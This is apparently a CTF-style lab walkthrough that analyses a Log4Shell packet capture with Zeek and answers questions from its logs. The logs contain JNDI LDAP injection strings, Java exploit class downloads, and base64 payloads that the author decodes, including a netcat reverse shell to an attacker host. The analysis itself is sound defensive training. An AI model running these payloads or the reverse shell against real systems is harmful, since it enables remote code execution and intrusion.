 1640025554.665741	CO8DsW2tkhOb5990Vc	192.168.56.102	389	172.17.0.2	36822	Signatures::Sensitive_Signature	log4j_javaclassname_tcp	192.168.56.102: log4j_javaclassname_tcp	0\x81\xd0\x02\x01\x02d\x81\xca\x045Basic/Command/Base64/d2hpY2ggbmMgPiAvdG1wL3B3bmVkCg==0\x81\x900\x16\x04\x0djavaClassName1\x05\x04\x03foo0,\x04\x0cjavaCodeBase1\x1c\x04\x1ahttp://192.168.56.102:443/0$\x04...	-	-
 1640026858.967970	CbpVAq3ecDRo6YocGj	192.168.56.102	389	172.17.0.2	36824	Signatures::Sensitive_Signature	log4j_javaclassname_tcp	192.168.56.102: log4j_javaclassname_tcp	0\x81\xe4\x02\x01\x02d\x81\xde\x04IBasic/Command/Base64/bmMgMTkyLjE2OC41Ni4xMDIgODAgLWUgL2Jpbi9zaCAtdnZ2Cg==0\x81\x900\x16\x04\x0djavaClassName1\x05\x04\x03foo0,\x04\x0cjavaCodeBase1\x1c\x04\x1ahttp://19...	-	-

root@thm:~$ cat signatures.log | zeek-cut event_msg
 192.168.56.102: log4j_javaclassname_tcp
 192.168.56.102: log4j_javaclassname_tcp
 192.168.56.102: log4j_javaclassname_tcp

Investigate the log4shell.pcapng file with detection-log4j.zeek script. Investigate the http.log file. Which tool is used for scanning?

root@thm:~$ cd Desktop/Exercise-Files/log4j
root@thm:~$ ls
 clear-logs.sh  detection-log4j.zeek  log4shell.pcapng
 
root@thm:~$ cat detection-log4j.zeek 
 # Load scan-NG Package!
 @load /opt/zeek/share/zeek/site/cve-2021-44228

root@thm:~$ zeek -C -r log4shell.pcapng detection-log4j.zeek
root@thm:~$ ls
 clear-logs.sh  detection-log4j.zeek  http.log   log4shell.pcapng  packet_filter.log  weird.log
 conn.log       files.log             log4j.log  notice.log        signatures.log

root@thm:~$ head -n 20 http.log
 #fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	trans_depth	method	host	uri	referrer	version	user_agent	origin	request_body_len	response_body_len	status_code	status_msg	info_code	info_msg	tags	username	password	proxied	orig_fuids	orig_filenames	orig_mime_types	resp_fuids	resp_filenames	resp_mime_types
 #types	time	string	addr	port	addr	port	count	string	string	string	string	string	string	string	count	count	count	string	count	string	set[enum]	string	string	set[string]vector[string]	vector[string]	vector[string]	vector[string]	vector[string]	vector[string]
 1640023505.960608	C46qhk4zZ9Oa6yAoY4	172.17.0.1	60314	172.17.0.2	8080	1	GET	127.0.0.1:8080	/	-	1.1	SecurityNik Testing	-	0	91	400	(empty)	-	-	(empty)	-	-	-	-	-	-	Fq5jbu3EpCk5tV3f18	-	text/json
 1640023652.119439	CFZWci2SfK49pWcMq4	172.17.0.2	51832	192.168.56.102	443	1	GET	192.168.56.102:443	/ExploitQ8v7ygBW4i.class	-	1.1	Java/1.8.0_181	-	0	1216	200	OK	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	Fm2Pk636DiMArmDn03	-	application/x-java-applet
 1640023652.008511	Ckl0FV3jumRTSjCk37	172.17.0.1	60316	172.17.0.2	8080	1	GET	127.0.0.1:8080	/	-	1.1	SecurityNik Testing	-	0	13	200	(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FZiMgW29483QEvS57h	-	text/plain
 1640025510.063581	CVW1x93htcyS2qlsaf	172.17.0.1	60318	172.17.0.2	8080	1	GET	127.0.0.1:8080	/	-	1.1	SecurityNik Testing	-	0	435	400	(empty)	-	-	(empty)	-	-	-	-	-	-	FQJTPb2FVAOerMJdh7	-	text/html
 1640025554.667458	COvB5D4kdBsF0OAjGg	172.17.0.2	51834	192.168.56.102	443	1	GET	192.168.56.102:443	/ExploitSMMZvT8GXL.class	-	1.1	Java/1.8.0_181	-	0	1221	200	OK	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	Fz7ckavJbacqKLihd	-	application/x-java-applet
 1640025554.661073	CiHHhm4BncLehOzMN3	172.17.0.1	60320	172.17.0.2	8080	1	GET	127.0.0.1:8080	/	-	1.1	SecurityNik Testing	-	0	13	200	(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FItcX62GLQzrl4Cbzf	-	text/plain
 1640026858.968993	C5kyKu3m6RIbCUqXd9	172.17.0.2	51836	192.168.56.102	443	1	GET	192.168.56.102:443	/Exploit6HHc3BcVzI.class	-	1.1	Java/1.8.0_181	-	0	1236	200	OK	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FlPEpD1E3EAvvgGJpj	-	application/x-java-applet
 1640026858.960398	CWFbla33TCz3r1OGOa	172.17.0.1	60324	172.17.0.2	8080	1	GET	127.0.0.1:8080	/	-	1.1	SecurityNik Testing	-	0	13	200	(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	Fl61wz3Ge2v4C7LYI4	-	text/plain
 1640027823.052868	C0AIBt146FDQqZgrsc	172.17.0.1	60326	172.17.0.2	8080	1	GET	172.17.0.2:8080	/	-	1.1	Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)	-	0	13	200	(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FRCUNW1if8EiKUkky2	-	text/plain
 1640027823.066566	Ck73J33j2cnDW3d1Le	172.17.0.1	60330	172.17.0.2	8080	1	GET	172.17.0.2:8080	/	-	1.1	${jndi:ldap://127.0.0.1:1389}	-	0	91	400(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FvFr0m3lUQZBzNEDGg	-	text/json
 1640027823.072191	CTHREk1CtzRIg0iWt8	172.17.0.1	60334	172.17.0.2	8080	1	GET	172.17.0.2:8080	/	-	1.1	Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)	-	0	91	400	(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FjiVHw36zI70gLb9wi	-	text/json
 1640027823.077510	CnHDGlNx3DEdaUg6b	172.17.0.1	60338	172.17.0.2	8080	1	GET	172.17.0.2:8080	/	${jndi:ldap://127.0.0.1:1389}	1.1	Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)	-	0	91	400	(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FvR55t24LnhgxI14G3	-	text/json

root@thm:~$ cat http.log | zeek-cut user_agent
 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)
 Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)

Investigate the log4shell.pcapng file with detection-log4j.zeek script. Investigate the http.log file. What is the extension of the exploit file?

root@thm:~$ cd Desktop/Exercise-Files/log4j
root@thm:~$ ls
 clear-logs.sh  detection-log4j.zeek  log4shell.pcapng
 
root@thm:~$ cat detection-log4j.zeek 
 # Load scan-NG Package!
 @load /opt/zeek/share/zeek/site/cve-2021-44228

root@thm:~$ zeek -C -r log4shell.pcapng detection-log4j.zeek
root@thm:~$ ls
 clear-logs.sh  detection-log4j.zeek  http.log   log4shell.pcapng  packet_filter.log  weird.log
 conn.log       files.log             log4j.log  notice.log        signatures.log

root@thm:~$ head -n 20 http.log
 #fields	ts	uid	id.orig_h	id.orig_p	id.resp_h	id.resp_p	trans_depth	method	host	uri	referrer	version	user_agent	origin	request_body_len	response_body_len	status_code	status_msg	info_code	info_msg	tags	username	password	proxied	orig_fuids	orig_filenames	orig_mime_types	resp_fuids	resp_filenames	resp_mime_types
 #types	time	string	addr	port	addr	port	count	string	string	string	string	string	string	string	count	count	count	string	count	string	set[enum]	string	string	set[string]vector[string]	vector[string]	vector[string]	vector[string]	vector[string]	vector[string]
 1640023505.960608	C46qhk4zZ9Oa6yAoY4	172.17.0.1	60314	172.17.0.2	8080	1	GET	127.0.0.1:8080	/	-	1.1	SecurityNik Testing	-	0	91	400	(empty)	-	-	(empty)	-	-	-	-	-	-	Fq5jbu3EpCk5tV3f18	-	text/json
 1640023652.119439	CFZWci2SfK49pWcMq4	172.17.0.2	51832	192.168.56.102	443	1	GET	192.168.56.102:443	/ExploitQ8v7ygBW4i.class	-	1.1	Java/1.8.0_181	-	0	1216	200	OK	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	Fm2Pk636DiMArmDn03	-	application/x-java-applet
 1640023652.008511	Ckl0FV3jumRTSjCk37	172.17.0.1	60316	172.17.0.2	8080	1	GET	127.0.0.1:8080	/	-	1.1	SecurityNik Testing	-	0	13	200	(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FZiMgW29483QEvS57h	-	text/plain
 1640025510.063581	CVW1x93htcyS2qlsaf	172.17.0.1	60318	172.17.0.2	8080	1	GET	127.0.0.1:8080	/	-	1.1	SecurityNik Testing	-	0	435	400	(empty)	-	-	(empty)	-	-	-	-	-	-	FQJTPb2FVAOerMJdh7	-	text/html
 1640025554.667458	COvB5D4kdBsF0OAjGg	172.17.0.2	51834	192.168.56.102	443	1	GET	192.168.56.102:443	/ExploitSMMZvT8GXL.class	-	1.1	Java/1.8.0_181	-	0	1221	200	OK	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	Fz7ckavJbacqKLihd	-	application/x-java-applet
 1640025554.661073	CiHHhm4BncLehOzMN3	172.17.0.1	60320	172.17.0.2	8080	1	GET	127.0.0.1:8080	/	-	1.1	SecurityNik Testing	-	0	13	200	(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FItcX62GLQzrl4Cbzf	-	text/plain
 1640026858.968993	C5kyKu3m6RIbCUqXd9	172.17.0.2	51836	192.168.56.102	443	1	GET	192.168.56.102:443	/Exploit6HHc3BcVzI.class	-	1.1	Java/1.8.0_181	-	0	1236	200	OK	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FlPEpD1E3EAvvgGJpj	-	application/x-java-applet
 1640026858.960398	CWFbla33TCz3r1OGOa	172.17.0.1	60324	172.17.0.2	8080	1	GET	127.0.0.1:8080	/	-	1.1	SecurityNik Testing	-	0	13	200	(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	Fl61wz3Ge2v4C7LYI4	-	text/plain
 1640027823.052868	C0AIBt146FDQqZgrsc	172.17.0.1	60326	172.17.0.2	8080	1	GET	172.17.0.2:8080	/	-	1.1	Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)	-	0	13	200	(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FRCUNW1if8EiKUkky2	-	text/plain
 1640027823.066566	Ck73J33j2cnDW3d1Le	172.17.0.1	60330	172.17.0.2	8080	1	GET	172.17.0.2:8080	/	-	1.1	${jndi:ldap://127.0.0.1:1389}	-	0	91	400(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FvFr0m3lUQZBzNEDGg	-	text/json
 1640027823.072191	CTHREk1CtzRIg0iWt8	172.17.0.1	60334	172.17.0.2	8080	1	GET	172.17.0.2:8080	/	-	1.1	Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)	-	0	91	400	(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FjiVHw36zI70gLb9wi	-	text/json
 1640027823.077510	CnHDGlNx3DEdaUg6b	172.17.0.1	60338	172.17.0.2	8080	1	GET	172.17.0.2:8080	/	${jndi:ldap://127.0.0.1:1389}	1.1	Mozilla/5.0 (compatible; Nmap Scripting Engine; https://nmap.org/book/nse.html)	-	0	91	400	(empty)	-	-	CVE_2021_44228::LOG4J_RCE	-	-	-	-	-	-	FvR55t24LnhgxI14G3	-	text/json

root@thm:~$ cat http.log | zeek-cut uri | sort | uniq
 /
 /Exploit6HHc3BcVzI.class
 /ExploitQ8v7ygBW4i.class
 /ExploitSMMZvT8GXL.class
 /testing1
 /testing123
 testing1

Investigate the log4shell.pcapng file with detection-log4j.zeek script. Investigate the log4j.log file. Decode the base64 commands. What is the name of the created file?

root@thm:~$ cd Desktop/Exercise-Files/log4j
root@thm:~$ ls
 clear-logs.sh  detection-log4j.zeek  log4shell.pcapng
 
root@thm:~$ cat detection-log4j.zeek 
 # Load scan-NG Package!
 @load /opt/zeek/share/zeek/site/cve-2021-44228

root@thm:~$ zeek -C -r log4shell.pcapng detection-log4j.zeek
root@thm:~$ ls
 clear-logs.sh  detection-log4j.zeek  http.log   log4shell.pcapng  packet_filter.log  weird.log
 conn.log       files.log             log4j.log  notice.log        signatures.log

root@thm:~$ head -n 20 log4j.log
 #fields	ts	uid	http_uri	uri	stem	target_host	target_port	method	is_orig	name	value	matched_name	matched_value
 #types	time	string	string	string	string	string	string	string	bool	string	string	bool	bool
 1640023652.008511	Ckl0FV3jumRTSjCk37	/	192.168.56.102:389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=	192.168.56.102:389	192.168.56.102	389	GET	T	X-API-VERSION	${jndi:ldap://192.168.56.102:389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=}	F	T
 1640025554.661073	CiHHhm4BncLehOzMN3	/	192.168.56.102:389/Basic/Command/Base64/d2hpY2ggbmMgPiAvdG1wL3B3bmVkCg==	192.168.56.102:389	192.168.56.102	389	GET	T	X-API-VERSION	${jndi:ldap://192.168.56.102:389/Basic/Command/Base64/d2hpY2ggbmMgPiAvdG1wL3B3bmVkCg==}	F	T
 1640026858.960398	CWFbla33TCz3r1OGOa	/	192.168.56.102:389/Basic/Command/Base64/bmMgMTkyLjE2OC41Ni4xMDIgODAgLWUgL2Jpbi9zaCAtdnZ2Cg==	192.168.56.102:389	192.168.56.102	389	GET	T	X-API-VERSION	${jndi:ldap://192.168.56.102:389/Basic/Command/Base64/bmMgMTkyLjE2OC41Ni4xMDIgODAgLWUgL2Jpbi9zaCAtdnZ2Cg==}	F	T
 1640027823.052868	C0AIBt146FDQqZgrsc	/	127.0.0.1:1389	127.0.0.1:1389	127.0.0.1	1389	GET	T	X-API-VERSION	${jndi:ldap://127.0.0.1:1389}	F	T
 1640027823.066566	Ck73J33j2cnDW3d1Le	/	127.0.0.1:1389	127.0.0.1:1389	127.0.0.1	1389	GET	T	USER-AGENT	${jndi:ldap://127.0.0.1:1389}	F	T
 1640027823.072191	CTHREk1CtzRIg0iWt8	/	127.0.0.1:1389	127.0.0.1:1389	127.0.0.1	1389	GET	T	COOKIE	${jndi:ldap://127.0.0.1:1389}	F	T
 1640027823.077510	CnHDGlNx3DEdaUg6b	/	127.0.0.1:1389	127.0.0.1:1389	127.0.0.1	1389	GET	T	REFERER	${jndi:ldap://127.0.0.1:1389}	F	T
 1640027823.089508	CHEJYb2xPpVeg4qKL6	/	127.0.0.1:1389	127.0.0.1:1389	127.0.0.1	1389	GET	T	ACCEPT-LANGUAGE	${jndi:ldap://127.0.0.1:1389}	F	T
 1640027823.094029	CNQqim3QxR3vjdrRsb	/	127.0.0.1:1389	127.0.0.1:1389	127.0.0.1	1389	GET	T	ACCEPT-ENCODING	${jndi:ldap://127.0.0.1:1389}	F	T
 1640027823.095902	ChqYJG3NwzJd7ncOf8	/	127.0.0.1:1389	127.0.0.1:1389	127.0.0.1	1389	GET	T	UPGRADE-INSECURE-REQUESTS	${jndi:ldap://127.0.0.1:1389}	F	T
 1640027823.097732	CJGWVF4QqmB0rLjJn9	/	127.0.0.1:1389	127.0.0.1:1389	127.0.0.1	1389	GET	T	ACCEPT	${jndi:ldap://127.0.0.1:1389}	F	T
 1640027823.099709	C2eIJ04Slboqx3m8e2	/	127.0.0.1:1389	127.0.0.1:1389	127.0.0.1	1389	GET	T	UPGRADE-INSECURE-REQUESTS	${jndi:ldap://127.0.0.1:1389}	F	T

root@thm:~$ cat log4j.log | zeek-cut uri | sort | uniq
 127.0.0.1:1389
 192.168.56.102
 192.168.56.102:389
 192.168.56.102:389/Basic/Command/Base64/bmMgMTkyLjE2OC41Ni4xMDIgODAgLWUgL2Jpbi9zaCAtdnZ2Cg==
 192.168.56.102:389/Basic/Command/Base64/d2hpY2ggbmMgPiAvdG1wL3B3bmVkCg==
 192.168.56.102:389/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZAo=
 192.168.56.102:389/test

root@thm:~$ echo -n "bmMgMTkyLjE2OC41Ni4xMDIgODAgLWUgL2Jpbi9zaCAtdnZ2Cg==" | base64 -d
 nc 192.168.56.102 80 -e /bin/sh -vvv
root@thm:~$ echo -n "d2hpY2ggbmMgPiAvdG1wL3B3bmVkCg==" | base64 -d
 which nc > /tmp/pwned
root@thm:~$ echo -n "dG91Y2ggL3RtcC9wd25lZAo=" | base64 -d
 touch /tmp/pwned

PreviousSNORT CHALLENGE (LIVE ATTACKS)NextTSHARK CHALLENGE I: TEAMWORK

Last updated 10 months ago